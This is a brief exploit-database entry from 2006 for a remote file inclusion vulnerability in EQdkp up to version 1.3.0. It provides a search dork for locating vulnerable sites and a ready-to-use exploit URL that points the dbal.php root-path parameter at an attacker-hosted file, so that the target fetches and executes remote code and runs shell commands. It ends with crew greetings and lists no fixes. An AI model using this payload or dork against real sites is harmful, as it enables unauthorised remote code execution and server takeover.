EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability

2006-05-07 00:00:00

Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

#

Fixes

No fixes

In order to submit a new fix you need to be registered.